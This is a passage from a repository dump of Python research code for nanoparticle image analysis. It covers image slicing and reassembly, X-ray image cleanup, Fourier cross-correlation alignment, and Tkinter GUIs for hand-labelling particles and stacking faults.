cmap='gray')\n print('done!')\n\ndef slicing_for_assembley(directory):\n \"\"\"Used to break up the 1024x1024 images into 64x64 segments takes a\n diretory that is the source. Same process as image_slice_small but all\n regions are saved so that regions can be stitched back together\"\"\"\n image_file_list = glob(directory+'/images/*.png')\n image_new_directory = directory + '/small_sliced_images_asmbl/'\n if os.path.isdir(image_new_directory) != True:\n os.mkdir(image_new_directory)\n label_file_list = glob(directory+'/labels/*.png')\n label_new_directory = directory + '/small_sliced_labels_asmbl/'\n if os.path.isdir(label_new_directory) != True:\n os.mkdir(label_new_directory)\n image_name_list = [name.split('/')[-1].split('.')[0] for name in image_file_list]\n label_name_list = [name.split('/')[-1].split('.')[0] for name in label_file_list]\n if len(image_name_list) != len(label_name_list):\n raise RuntimeError('different number of images and labels')\n if image_name_list != label_name_list:\n raise RuntimeError('images and labels did not match')\n for idx, file in enumerate(image_file_list):\n image2split = io.imread(file, as_grey=True)\n label2split = io.imread(label_file_list[idx], as_grey=True)\n for x in range(0,16*64,64):\n for y in range(0,16*64,64):\n image = image2split[x:x+64,y:y+64]\n label = label2split[x:x+64,y:y+64]\n image_name = image_name_list[idx]+ '-' + str(x)+ '-' + str(y) + '.png'\n if x != 64 and y != 64:\n label_name = image_name_list[idx]+ '-' + str(x)+ '-' + str(y) + '.png'\n elif x != 64 and y == 64:\n label_name = image_name_list[idx]+ '-' + str(x)+ '-' + str(0) +str(y) + '.png'\n elif x == 64 and y != 64:\n label_name = image_name_list[idx]+ '-' +str(0)+str(x)+ '-' +str(y) + '.png'\n elif x == 64 and y == 64:\n label_name = image_name_list[idx]+ '-' + str(0)+ str(x)+ '-' + str(0) +str(y) + '.png'\n plt.imsave(image_new_directory+image_name,image, cmap='gray')\n plt.imsave(label_new_directory+label_name,label, cmap='gray')\n print('done!')\n\ndef reassemble_slices(directory):\n label_file_list = glob(directory+'/small_sliced_labels/*.png')\n label_file_list.append('end')\n previous_label = label_file_list[0].split('/')[-1].split('-')[0]\n previous_x = 'start'\n# previous_y = label_file_list[0].split('/')[-1].split('-')[2].split('.')[0]\n img_row = np.zeros((64,64))\n image = np.zeros((64,64))\n label_dict = {}\n for label in label_file_list:\n original_label = label.split('/')[-1].split('-')[0]\n if label != 'end':\n sub_img = io.imread(label, as_grey=True)\n sub_x = label.split('/')[-1].split('-')[1]\n sub_y = label.split('/')[-1].split('-')[2].split('.')[0]\n if original_label == previous_label:\n if previous_x == 'start':\n img_row = sub_img\n previous_x = sub_x\n elif sub_x == str(0) and previous_x == sub_x:\n img_row = np.concatenate((img_row,sub_img),axis =1)\n previous_x = sub_x\n elif previous_x != sub_x and previous_x == str(0):\n image = img_row\n img_row = sub_img\n previous_x = sub_x\n elif sub_x != str(0) and previous_x == sub_x:\n img_row = np.concatenate((img_row,sub_img),axis =1)\n previous_x = sub_x\n elif previous_x != sub_x and previous_x != str(0) and previous_x != 'start':\n image = np.concatenate((image,img_row),axis =0)\n img_row = sub_img\n previous_x = sub_x\n else:\n image = np.concatenate((image,img_row),axis =0)\n label_dict[previous_label] = image\n previous_label = original_label\n image = np.zeros((64,64))\n img_row = sub_img\n previous_x = sub_x\n previous_label = original_label\n if os.path.isdir(directory+'/reconstructed_images') == False:\n new_directory = directory+'/reconstructed_images'\n os.mkdir(new_directory)\n else:\n new_directory = directory+'/reconstructed_images'\n for key in label_dict:\n plt.imsave(new_directory+'/'+key+'.png',label_dict[key],cmap = 'gray')\n print('done!')\n" }, { "alpha_fraction": 0.5899433493614197, "alphanum_fraction": 0.6154391169548035, "avg_line_length": 32.619049072265625, "blob_id": "7c07a0a9ab5b9c22e08b706e231e06dd5ea29690", "content_id": "3f51c78ead91ee64ad0e78876481abda40e601e7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1412, "license_type": "no_license", "max_line_length": 85, "num_lines": 42, "path": "/image_processing/timage_v0.py", "repo_name": "ckgrosch/particleRecognition", "src_encoding": "UTF-8", "text": "import skimage as sk\nfrom skimage import io\nfrom skimage import exposure\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\n\ndef imm(image):\n fig, ax = plt.subplots(figsize=(10,10))\n ax.imshow(image, cmap = 'gray')\n ax.axis('off')\n\ndef clean_xray(img):\n image = sk.img_as_float(img.copy())\n if type(image) is not np.ndarray:\n raise TypeError('Input must be numpy ndarray.')\n else:\n p1 = np.percentile(image, 0.0001)\n p80, p99 = np.percentile(image, (80, 99.99))\n print(\"mean:\",image.mean(),'p80: ',p80,'p99: ',p99)\n image[image > p99] = p80\n image[image<p1] = p1\n return sk.img_as_ubyte(image)\n\n# def auto_adjust_TEM(image):\n# image = exposure.equalize_adapthist(exposure.adjust_sigmoid(clean_xray(image)))\n# return image\n\ndef adjust_pipeline(directory_list):\n for directory in directory_list:\n try:\n os.mkdir(directory+'/adjustedTif')\n new_directory = directory+'/adjustedTif'\n except:\n new_directory = directory+'/adjustedTif'\n images = io.ImageCollection(directory+\"/*.tif\")\n file_list = images.files\n name_list = [name.split('/')[-1].split('.')[0] for name in file_list]\n for idx, img in enumerate(images):\n image = clean_xray(img)\n plt.imsave(new_directory+'/'+name_list[idx]+'.png',image, cmap='gray')\n print('done!')\n" }, { "alpha_fraction": 0.6430547833442688, "alphanum_fraction": 0.6655071377754211, "avg_line_length": 46.37453079223633, "blob_id": "92e6a3c85cf5351a02c7b2ff97ee9b06337c1b4a", "content_id": "75694463e23101f08fbfd5a3ee77dc5643d63570", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12649, "license_type": "no_license", "max_line_length": 365, "num_lines": 267, "path": "/image_processing/ncempy/algo/multicorr.py", "repo_name": "ckgrosch/particleRecognition", "src_encoding": "UTF-8", "text": "'''\nModule to correlate two images, functionally written.\n'''\n\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport cv2\n\ndef multicorr(G1, G2, method = 'cross', upsampleFactor = 1):\n '''\n Align a template to an image, possibly with multiple alignment peaks.\n Inputs:\n G1 - Fourier transform of image we are aligning to. Image reference\n G2 - Fourier transform of image that is being aligned. Image being registered\n Optional Inputs:\n 'phase' or 'cross' or 'hybrid' - string that specifies correlation method used. (default = 'cross')\n upsampleFactor - scalar integer specifying 1/subpixel_precision of fit. (default = 1)\n\n Returns:\n xyShift - the shift between G1 and G2 in pixels\n\n Defaults -\n method = 'phase';\n peakSearchMode = false; By default, we return only global best shift value.\n upsampleFactor = 1;\n '''\n method, upsampleFactor = parse_input(G1, G2, method, upsampleFactor)\n imageCorr = initial_correlation_image(G1, G2, method, upsampleFactor)\n xyShift = upsampled_correlation(imageCorr, upsampleFactor)\n print(method)\n print('------------')\n return xyShift\n\ndef parse_input(G1, G2, method = 'cross', upsampleFactor = 1):\n '''This function parses the inputs to make sure they're correct. Will raise errors if G1 or G2 are not ndarrays.\n\n Inputs:\n G1 - Fourier transform of image we are aligning to. Image reference\n G2 - Fourier transform of image that is being aligned. Image being registered\n method - correlation method ('phase', 'cross', 'hybrid'). Default 'cross'\n upsampleFactor - scalar integer specifying 1/subpixel_precision of fit. Default = 1.\n\n Returns:\n method - string ('phase', 'cross', 'hybrid')\n upsampleFactor - scalar integer\n '''\n # Check to make sure both G1 and G2 are arrays\n if type(G1) is not np.ndarray:\n raise TypeError('G1 must be an ndarray')\n elif type(G2) is not np.ndarray:\n raise TypeError('G2 must be an ndarray')\n\n # Check to make sure method and upsample factor are the correct values\n if method not in ['phase', 'cross', 'hybrid']:\n print('Unknown method used, setting to cross')\n method = 'cross'\n\n if type(upsampleFactor) is not int and type(upsampleFactor) is not float:\n print('Upsample factor is not an integer or float, setting to 1')\n upsampleFactor = 1\n elif type(upsampleFactor) is not int:\n print('Upsample factor is not an integer, rounding down')\n upsampleFactor = int(upsampleFactor)\n if upsampleFactor < 1:\n print('Upsample factor is < 1, setting to 1')\n upsampleFactor = 1\n\n # Verify images are the same size.\n if G1.shape != G2.shape:\n raise TypeError('G1 and G2 are not the same size, G1 is {0} and G2 is {1}'.format(str(G1.shape), str(G2.shape)))\n\n return method, upsampleFactor\n\ndef initial_correlation_image(G1, G2, method = 'cross', upsampleFactor = 1):\n '''\n Generate correlation image at initial resolution using the method specified.\n\n Inputs:\n G1 - Fourier transform of image we are aligning to. Image reference\n G2 - Fourier transform of image that is being aligned. Image being registered\n method - correlation method ('phase', 'cross', 'hybrid'). Default 'cross'\n upsampleFactor - scalar integer specifying 1/subpixel_precision of fit. Default = 1.\n\n Returns:\n imageCorr - an ndarray correlation image that has not yet been inverse Fourier transformed.\n '''\n G12 = np.multiply(G2, np.conj(G1)) # is this the correct order that we want?\n if method == 'phase':\n imageCorr = np.exp(1j * np.angle(G12))\n elif method == 'cross':\n imageCorr = G12\n elif method == 'hybrid':\n imageCorr = np.multiply(np.sqrt(np.absolute(G12)), np.exp(1j * np.angle(G12)))\n else:\n raise TypeError('{} method is not allowed'.format(str(method)))\n\n return imageCorr\n\ndef upsampled_correlation(imageCorr, upsampleFactor):\n '''\n Upsamples the correlation image by a set integer factor upsampleFactor. If upsampleFactor == 2, then it is naively Fourier upsampled. If the upsampleFactoris higher than 2, then it uses dftUpsample, which is a more efficient way to Fourier upsample the image.\n\n Inputs:\n imageCorr - Fourier transformed correlation image returned by initial_correlation_image. Is an ndarray.\n upsampleFactor - scalar integer of how much upsampling should be performed.\n\n Returns:\n xyShift - two element list with shift in x and y of G2 with respect to G1.\n '''\n\n imageCorrIFT = np.real(np.fft.ifft2(imageCorr))\n xyShift = list(np.unravel_index(imageCorrIFT.argmax(), imageCorrIFT.shape, 'C'))\n # print(['xyShift pre mod '] + xyShift)\n if upsampleFactor == 1:\n imageSize = imageCorrIFT.shape\n xyShift[0] = ((xyShift[0] + imageSize[0]/2) % imageSize[0]) - imageSize[0]/2\n xyShift[1] = ((xyShift[1] + imageSize[1]/2) % imageSize[1]) - imageSize[1]/2\n # print(['xyShift post mod '] + xyShift)\n #G2shift = np.fft.fft2(np.roll(np.roll(np.fft.ifft2(G2), int(xyShift[0]), 0), int(xyShift[1]), 1))\n else:\n imageCorrLarge = upsampleFFT(imageCorr, 2)\n imageSizeLarge = imageCorrLarge.shape\n xySubShift2 = list(np.unravel_index(imageCorrLarge.argmax(), imageSizeLarge, 'C'))\n print(['xySubShift2 '] + xySubShift2)\n xySubShift2[0] = ((xySubShift2[0] + imageSizeLarge[0]/2) % imageSizeLarge[0]) - imageSizeLarge[0]/2\n xySubShift2[1] = ((xySubShift2[1] + imageSizeLarge[1]/2) % imageSizeLarge[1]) - imageSizeLarge[1]/2\n xyShift = [i/2 for i in xySubShift2] #signs have to flip, or mod wrong?\n # print(xySubShift2)\n print(['xyShiftln127'] + xyShift)\n\n if upsampleFactor > 2:\n # here is where we use DFT registration to make things much faster\n # we cut out and upsample a peak 1.5 by 1.5 px from our original correlation image.\n\n xyShift[0] = np.round(xyShift[0] * upsampleFactor) / upsampleFactor\n xyShift[1] = np.round(xyShift[1] * upsampleFactor) / upsampleFactor\n\n globalShift = np.fix(np.ceil(upsampleFactor * 1.5)/2)# this line might have an off by one error based. The associated matlab comment is \"this will be used to center the output array at dftshift + 1\"\n print('globalShift', globalShift, 'upsampleFactor', upsampleFactor, 'xyShift', xyShift)\n\n imageCorrUpsample = np.conj(dftUpsample(np.conj(imageCorr), upsampleFactor, globalShift - np.multiply(xyShift, upsampleFactor))) / (np.fix(imageSizeLarge[0]) * np.fix(imageSizeLarge[1]) * upsampleFactor ** 2)\n\n xySubShift = np.unravel_index(imageCorrUpsample.argmax(), imageCorrUpsample.shape, 'C')\n # xySubShift = np.add(list(xySubShift), [1, 1])\n print('xySubShift', xySubShift)\n\n # add a subpixel shift via parabolic fitting\n try:\n icc = np.real(imageCorrUpsample[xySubShift[0] - 1 : xySubShift[0] + 2, xySubShift[1] - 1 : xySubShift[1] + 2])\n dx = (icc[2,1] - icc[0,1]) / (4 * icc[1,1] - 2 * icc[2,1] - 2 * icc[0,1])\n dy = (icc[1,2] - icc[1,0]) / (4 * icc[1,1] - 2 * icc[1,2] - 2 * icc[1,0])\n except:\n dx, dy = 0, 0 # this is the case when the peak is near the edge and one of the above values does not exist\n print('dxdy', dx, dy)\n print('xyShift', xyShift)\n xySubShift = xySubShift - globalShift;\n print('xysubShift2', xySubShift)\n xyShift = xyShift + (xySubShift + np.array([dx, dy])) / upsampleFactor\n print('xyShift2', xyShift)\n\n return xyShift\n\ndef upsampleFFT(imageInit, upsampleFactor):\n '''\n This does a Fourier upsample of the imageInit. imageInit is the Fourier transform of the correlation image. upsampleFactor is self-descriptive. The function returns the real space correlation image that has been Fourier upsampled by 2. It is written generally such that upsampleFactor can be greater than 2, but that should never happend/it has not been tested.\n\n The way it works is that it embeds imageInit in a larger array of zeros, then does the inverse Fourier transform to return the Fourier upsampled image in real space.\n\n Inputs:\n imageInit - ndarray of the image to be Fourier upsampled. This should be in the Fourier domain.\n upsampleFactor - integer scalar, almost always 2.\n\n Returns:\n imageUpsampleReal - the inverse Fourier transform of imageInit upsampled by the upsampleFactor. Is an ndarray.\n '''\n imageSize = imageInit.shape\n imageUpsample = np.zeros(tuple((i*upsampleFactor for i in imageSize))) + 0j\n imageUpsample[:imageSize[0], :imageSize[1]] = imageInit\n # plt.figure(1)\n # plt.imshow(np.real(imageUpsample))\n # plt.show(block = True)\n imageUpsample = np.roll(np.roll(imageUpsample, -int(imageSize[0]/2), 0), -int(imageSize[1]/2),1)\n imageUpsampleReal = np.real(np.fft.ifft2(imageUpsample))\n # plt.figure(1)\n # plt.imshow(imageUpsampleReal)\n # plt.show(block = True)\n return imageUpsampleReal\n\ndef dftUpsample(imageCorr, upsampleFactor, xyShift):\n '''\n This performs a matrix multiply DFT around a small neighboring region of the inital correlation peak. By using the matrix multiply DFT to do the Fourier upsampling, the efficiency is wildly improved. This is adapted from the subfuction dftups found in the dftregistration function on the Matlab File Exchange.\n\n https://www.mathworks.com/matlabcentral/fileexchange/18401-efficient-subpixel-image-registration-by-cross-correlation\n\n The matrix multiplication DFT is from Manuel Guizar-Sicairos, Samuel T. Thurman, and James R. Fienup, \"Efficient subpixel image registration algorithms,\" Opt. Lett. 33, 156-158 (2008). http://www.sciencedirect.com/science/article/pii/S0045790612000778\n\n Inputs:\n imageCorr - correlation image between two images in Fourier space. ndarray.\n upsampleFactor - scalar integer of how much to upsample.\n xyShift - single pixel shift between images previously computed. Used to center the matrix multiplication on the correlation peak. Is a two element list.\n Returns:\n imageUpsample - upsampled image from region around correlation peak. Is a ndarray (and I think the conjugate of the upsampled peak. Has to do wtih order of operations?)\n '''\n imageSize = imageCorr.shape\n pixelRadius = 1.5\n numRow = np.ceil(pixelRadius * upsampleFactor)\n numCol = numRow\n\n colKern = np.exp(\n (-1j * 2 * np.pi / (imageSize[1] * upsampleFactor))\n * (np.fft.ifftshift( (np.arange(imageSize[1])) )\n - np.floor(imageSize[1]/2))\n * (np.arange(numCol) - xyShift[1])[:, np.newaxis]\n ) # I think this can be written differently without the need for np.newaxis. This might require np.outer to compute the matrix itself instead of just using np.dot.\n\n rowKern = np.exp(\n (-1j * 2 * np.pi / (imageSize[0] * upsampleFactor))\n * (np.arange(numRow) - xyShift[0])\n * (np.fft.ifftshift(np.arange(imageSize[0]))\n - np.floor(imageSize[0]/2))[:, np.newaxis]\n ) # Comment from above applies.\n\n imageUpsample = np.real(np.dot(np.dot(rowKern.transpose(), imageCorr), colKern.transpose()))\n\n return imageUpsample\n\ndef imageShifter(G2, xyShift):\n '''\n This function multiplies G2 by a plane wave that has the real space effect of shifting ifft2(G2) by [x, y] pixels.\n\n Inputs:\n G2 - the Fourier transform of an image. ndarray.\n xyShift - a two element list\n\n Returns:\n G2shift - Fourier shifted G2. ndarray.\n '''\n imageSize = G2.shape\n qx = makeFourierCoords(imageSize[0], 1) # does this need to be a column vector\n if imageSize[1] == imageSize[0]:\n qy = qx\n else:\n qy = makeFourierCoords(imageSize[1], 1)\n\n G2shift = np.multiply(G2, np.outer( np.exp(-2j * np.pi * qx * xyShift[0]), np.exp(-2j * np.pi * qy * xyShift[1])))\n\n return G2shift\n\ndef makeFourierCoords(N, pSize):\n '''\n This function creates Fourier coordinates such that (0,0) is in the center of the array.\n\n Inputs:\n N - the maximum coordinate in the original frame.\n pSize - the pixel size\n\n Returns:\n q - a single row array that has transformed 0:N to -N/2:N/2, such that the array sizes are the same.\n '''\n\n N = float(N)\n if N % 2 == 0:\n q = np.roll(np.arange(-N/2, N/2, dtype = 'float64') / (N * pSize), int(-N/2), axis=0)\n else:\n q = np.roll(np.arange((1-N)/2, (N+1)/2) / (N * pSize), int((1-N)/2), axis=0)\n return q\n" }, { "alpha_fraction": 0.6830986142158508, "alphanum_fraction": 0.7112675905227661, "avg_line_length": 46.33333206176758, "blob_id": "2ecf1d19e05fe0781eaebd37012f7ecbcbe4a314", "content_id": "0014d36f09c66fd0067fbd6fe376d8510d27ef27", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 142, "license_type": "no_license", "max_line_length": 54, "num_lines": 3, "path": "/classfier_builds/tests_rough_draft.py", "repo_name": "ckgrosch/particleRecognition", "src_encoding": "UTF-8", "text": "def test_label_reader(txt_file,image_file_1024):\n labels, images = label_reader(txt_file,image_file)\n assert len(labels) == len(images)\n" }, { "alpha_fraction": 0.6227520108222961, "alphanum_fraction": 0.6394813656806946, "avg_line_length": 36.757896423339844, "blob_id": "20d73d4c250ae64c4de069a3ab99817d9addb898", "content_id": "bf16e90e7f80b9bc311b42b92feeb7ac84a38aad", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7173, "license_type": "no_license", "max_line_length": 163, "num_lines": 190, "path": "/label_data_gui/test_gui_scroll.py", "repo_name": "ckgrosch/particleRecognition", "src_encoding": "UTF-8", "text": "from tkinter import *\nfrom tkinter import filedialog\nfrom PIL import Image, ImageTk\nimport glob\nimport os\nimport numpy as np\n\ndef init(data):\n data.circleCenters = [ ]\n data.recordCircleCenters = [ ]\n data.radii = [ ]\n data.labels = [ ]\n data.newCircleCenter = [0,0]\n data.imageSize = []\n\ndef getFiles(root):\n directory = filedialog.askdirectory() \n root.update() \n name = \".\"\n path = directory + \"/*.png\"\n print(path) \n files = []\n for fname in glob.glob(path):\n files.append(fname)\n \n return(files, path)\n\ndef imageOpen(files,data):\n image = Image.open(files[data.fileCounter])\n data.imageSize.append(image.size)\n #image = image.resize((512,512), Image.BICUBIC) #DONT CHANGE THIS UNLESS YOU CHANGE DEPENDECE OF OUTPUT\n photo = ImageTk.PhotoImage(image)\n return(photo)\n \ndef saveLabel(files,data):\n split = files[data.fileCounter].split(\".\")\n fname = split[0] + \".txt\"\n label_file = open(fname, \"w\")\n label_file.write(\"Particle Location:\\n\")\n for loc in data.recordCircleCenters:\n label_file.write(str(loc)+\"\\n\")\n label_file.write(\"\\n\"+\"Radius Size:\"+\"\\n\")\n for r in data.radii:\n #real_r = np.multiply(r,2) #because r is with respect to the 512x512 image not 1024x1024\n label_file.write(str(r)+\"\\n\")\n label_file.write(\"\\n\"+\"Defect Label:\"+\"\\n\")\n for label in data.labels:\n label_file.write(label+\"\\n\")\n label_file.write(\"\\n\"+\"Image Size:\"+\"\\n\")\n for size in data.imageSize: #so you can check that the original image was 1024x1024\n label_file.write(str(size)+\"\\n\")\n label_file.close()\n\ndef mousePressed(event, data,canvas, scrollbar):\n y_offset = scrollbar.get()[0]*1024\n data.newCircleCenter = [canvas.canvasx(event.x),canvas.canvasy(event.y)+y_offset]\n recordCircleCenter = [canvas.canvasx(event.x),canvas.canvasy(event.y)+y_offset] \n data.circleCenters.append(data.newCircleCenter)\n data.recordCircleCenters.append(recordCircleCenter)\n data.radii.append(data.radius)\n data.labels.append('null') #this marks particle as found but not atomic rez\n\ndef keyPressed(event, data,files,root):\n if (event.keysym == \"BackSpace\"):\n if (len(data.circleCenters) > 0):\n data.circleCenters.pop()\n data.recordCircleCenters.pop()\n data.radii.pop()\n data.labels.pop()\n else:\n print(\"No more circles to delete!\")\n if event.char == \"e\": #enlarge circle\n data.radius += 1\n data.radii.pop()\n data.radii.append(data.radius)\n if event.char == \"d\": #decrease circle\n data.radius -= 1\n data.radii.pop()\n data.radii.append(data.radius)\n if event.keysym == \"Up\": #move circle up\n data.newCircleCenter[1] -= 1\n data.circleCenters.pop()\n data.circleCenters.append(data.newCircleCenter)\n data.recordCircleCenters[-1][1] -= 1\n if event.keysym == \"Down\": #move circle down\n data.newCircleCenter[1] += 1\n data.circleCenters.pop()\n data.circleCenters.append(data.newCircleCenter)\n data.recordCircleCenters[-1][1] += 1\n if event.keysym == \"Left\": #move circle left\n data.newCircleCenter[0] -= 1\n data.circleCenters.pop()\n data.circleCenters.append(data.newCircleCenter)\n data.recordCircleCenters[-1][0] -= 1\n if event.keysym == \"Right\":\n data.newCircleCenter[0] += 1\n data.circleCenters.pop()\n data.circleCenters.append(data.newCircleCenter)\n data.recordCircleCenters[-1][0] += 1\n if (event.char == \"y\"): #this means there is a stacking fault\n data.labels.pop()\n data.labels.append('yes')\n if (event.char == \"n\"): #means the particle contained no stacking faults and was atomic rez\n data.labels.pop()\n data.labels.append('no')\n if (event.char == \"o\"): #this marks particle as found but not atomic rez for use if accidently marked\n data.labels.pop()\n data.labels.append('null')\n if event.keysym == \"Return\":\n saveLabel(files,data)\n data.fileCounter += 1\n data.photo = imageOpen(files,data)\n data.circleCenters = [ ]\n data.recordCircleCenters = [ ]\n data.radii = [ ]\n data.labels = [ ]\n data.imageSize = []\n if (event.char == \"q\"):\n quitGui(root)\n\ndef redrawAll(canvas, data):\n #draw the photo\n canvas.create_image(0,0,image = data.photo,anchor = \"nw\")\n # draw the circles\n for idx,circleCenter in enumerate(data.circleCenters):\n if (len(data.radii) > 0):\n (cx, cy) = circleCenter\n canvas.create_oval(cx-data.radii[idx], cy-data.radii[idx], cx+data.radii[idx], cy+data.radii[idx], fill=None, outline = \"magenta\")\n else:\n (cx, cy) = circleCenter\n canvas.create_oval(cx-data.radii[idx], cy-data.radii[idx], cx+data.radius, cy+data.radius, fill=None, outline = \"magenta\")\n # draw the text\n for idx,center in enumerate(data.circleCenters):\n canvas.create_text(center[0], center[1]-(data.radii[idx]+5),activefill = 'magenta',fill = 'black', font = ('Helvetica', '16','bold'),text=data.labels[idx])\n \n\ndef quitGui(root):\n root.destroy()\n \ndef redrawAllWrapper(canvas, data):\n canvas.delete(ALL)\n canvas.create_rectangle(0, 0, data.width, data.height,\n fill='white', width=0)\n redrawAll(canvas, data)\n canvas.update() \n\ndef mousePressedWrapper(event, canvas, data, scrollbar):\n mousePressed(event, data, canvas, scrollbar)\n redrawAllWrapper(canvas, data)\n\ndef keyPressedWrapper(event, canvas,data,files,root):\n keyPressed(event, data,files,root)\n redrawAllWrapper(canvas, data)\n\nif __name__ == \"__main__\":\n root = Tk()\n\n #setting up a tkinter canvas with scrollbars\n frame = Frame(root, bd=2, relief=SUNKEN)\n frame.grid_rowconfigure(0, weight=1)\n frame.grid_columnconfigure(0, weight=1)\n xscroll = Scrollbar(frame, orient=HORIZONTAL)\n xscroll.grid(row=1, column=0, sticky=E+W)\n yscroll = Scrollbar(frame)\n yscroll.grid(row=0, column=1, sticky=N+S)\n canvas = Canvas(frame, width = 512, height = 512, bd=0, xscrollcommand=xscroll.set, yscrollcommand=yscroll.set)\n canvas.grid(row=0, column=0, sticky=N+S+E+W)\n xscroll.config(command=canvas.xview)\n yscroll.config(command=canvas.yview)\n frame.pack(fill=BOTH,expand=1)\n\n #adding the image\n File = filedialog.askopenfilename(parent=root, initialdir=\"C:/\",title='Choose an image.')\n img = ImageTk.PhotoImage(Image.open(File))\n canvas.create_image(0,0,image=img,anchor=\"nw\")\n canvas.create_oval(1023, 1023, 1024, 1024, fill=\"magenta\", outline = \"magenta\")\n canvas.config(scrollregion=canvas.bbox(ALL))\n \n\n #function to be called when mouse is clicked\n def printcoords(event):\n #outputting x and y coords to console\n x_extra = xscroll.get()\n y_extra = yscroll.get()\n print('x_extra: ', x_extra, 'yextra: ', y_extra)\n print (canvas.canvasx(event.x)+(1024*x_extra[0]),canvas.canvasy(event.y)+(1024*y_extra[0]))\n #mouseclick event\n canvas.bind(\"<Button 1>\",printcoords)\n\n root.mainloop()" }, { "alpha_fraction": 0.6944444179534912, "alphanum_fraction": 0.7006173133850098, "avg_line_length": 23.923076629638672, "blob_id": "45546305e0165657dfe2461e0d26b1099221df57", "content_id": "25265b880ae10b303aeda8a4c327cac979246c82", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 324, "license_type": "no_license", "max_line_length": 83, "num_lines": 13, "path": "/image_processing/timage_app_v2.py", "repo_name": "ckgrosch/particleRecognition", "src_encoding": "UTF-8", "text": "import timage_v2 as tim\nimport sys\n\n\nfname = input('paste directory colletion text file name here or type q to quit: ',)\nif fname == 'q':\n sys.exit()\nwith open(fname) as f:\n content = f.readlines()\ndirectory_list = [x.strip('\\n') for x in content]\n\n#run the pipeline from timage_v0\ntim.adjust_pipeline(directory_list)\n" }, { "alpha_fraction": 0.5978914499282837, "alphanum_fraction": 0.6035549640655518, "avg_line_length": 35.43492126464844, "blob_id": "96bb7aaacc1eb084558a803bcbe4af72938d097b", "content_id": "bda74c521fe3439b1adb85612a09c9295a303132", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11477, "license_type": "no_license", "max_line_length": 333, "num_lines": 315, "path": "/label_data_gui/particle_label_gui_v10.py", "repo_name": "ckgrosch/particleRecognition", "src_encoding": "UTF-8", "text": "from tkinter import filedialog\nfrom tkinter import *\nfrom PIL import Image, ImageTk\nimport glob\nimport os\nimport numpy as np\nfrom ast import literal_eval\n\n\n####################################\n# Subfunctions for initializing, file opening, and interactions\n####################################\n\ndef init(data):\n data.circleCenters = [ ]\n data.radii = [ ]\n data.labels = [ ]\n data.imageSize = []\n\ndef getFiles(root):\n directory = filedialog.askdirectory()\n root.update()\n name = \".\"\n path = directory + \"/*.png\"\n txtpath = directory + \"/*.txt\"\n files = []\n txtfiles = []\n for fname in glob.glob(path):\n files.append(fname)\n for filename in glob.glob(txtpath):\n txtfiles.append(filename)\n\n return(files, txtfiles, directory)\n\ndef txt_reader(file):\n txt_info = open(file,'r')\n txt = []\n centers = []\n radii = []\n labels = []\n for line in txt_info:\n if line == '\\n':\n pass\n else:\n line = line.strip('\\n')\n txt.append(line)\n if 'Weird' in txt[0].split(' '):\n weird = txt[0]\n else:\n weird = 'Not Weird Data'\n weird_stop = txt.index('Particle Location:')\n center_stop = txt.index('Radius Size:')\n radius_stop = txt.index('Defect Label:')\n defect_stop = txt.index('Image Size:')\n for loc in txt[weird_stop+1:center_stop]:\n centers.append(literal_eval(loc))\n for loc in txt[center_stop+1:radius_stop] :\n radii.append(int(loc))\n for loc in txt[radius_stop+1:defect_stop]:\n labels.append(loc)\n return(centers, radii,labels, weird)\n\ndef imageOpen(files,data):\n image = Image.open(files[data.fileCounter])\n data.imageSize.append(image.size)\n photo = ImageTk.PhotoImage(image)\n imgname = files[data.fileCounter].split('/')[-1].split('.')[0]\n if imgname in data.textnames:\n txtfile = data.directory+'/'+imgname+'.txt'\n centers, radii, labels, weird = txt_reader(txtfile)\n else:\n centers = []\n radii = []\n labels = []\n weird = 'Not Weird Data'\n return(photo, centers, radii, labels, weird)\n\ndef saveLabel(files,data):\n split = files[data.fileCounter].split(\".\")\n fname = split[0] + \".txt\"\n label_file = open(fname, \"w\")\n if data.weird == 'Weird Data':\n label_file.write('Weird Data'+ '\\n')\n else:\n label_file.write('Not Weird Data'+ '\\n')\n label_file.write(\"Particle Location:\\n\")\n for loc in data.circleCenters:\n label_file.write(str(loc)+\"\\n\")\n label_file.write(\"\\n\"+\"Radius Size:\"+\"\\n\")\n for r in data.radii:\n label_file.write(str(r)+\"\\n\")\n label_file.write(\"\\n\"+\"Defect Label:\"+\"\\n\")\n for label in data.labels:\n label_file.write(label+\"\\n\")\n label_file.write(\"\\n\"+\"Image Size:\"+\"\\n\")\n for size in data.imageSize:\n label_file.write(str(size)+\"\\n\")\n label_file.close()\n\ndef mousePressed(event, data,canvas, scrollbar):\n y_offset = scrollbar.get()[0]*1024\n data.newCircleCenter = [float(event.x),event.y+y_offset]\n data.circleCenters.append(data.newCircleCenter)\n data.radii.append(data.radius)\n data.labels.append('null') #this marks particle as found but not atomic rez\n\ndef keyPressed(event, data,files,root):\n if (event.keysym == \"BackSpace\"):\n if (len(data.circleCenters) > 0):\n data.circleCenters.pop()\n data.radii.pop()\n data.labels.pop()\n else:\n print(\"No more circles to delete!\")\n if event.char == \"e\": #enlarge circle\n data.radius += 1\n data.radii.pop()\n data.radii.append(data.radius)\n if event.char == \"d\": #decrease circle\n data.radius -= 1\n data.radii.pop()\n data.radii.append(data.radius)\n if event.keysym == \"Up\": #move circle up\n data.newCircleCenter[1] -= 1\n data.circleCenters.pop()\n data.circleCenters.append(data.newCircleCenter)\n if event.keysym == \"Down\": #move circle down\n data.newCircleCenter[1] += 1\n data.circleCenters.pop()\n data.circleCenters.append(data.newCircleCenter)\n if event.keysym == \"w\":\n if data.weird == 'Weird Data':\n data.weird = 'Not Weird Data'\n print('Marked image not weird')\n else:\n data.weird = 'Weird Data'\n print('Marked image as weird')\n if event.keysym == \"Left\": #move circle left\n data.newCircleCenter[0] -= 1\n data.circleCenters.pop()\n data.circleCenters.append(data.newCircleCenter)\n if event.keysym == \"Right\":\n data.newCircleCenter[0] += 1\n data.circleCenters.pop()\n data.circleCenters.append(data.newCircleCenter)\n if (event.char == \"y\"): #this means there is a stacking fault\n data.labels.pop()\n data.labels.append('yes')\n if (event.char == \"n\"): #means the particle contained no stacking faults and was atomic 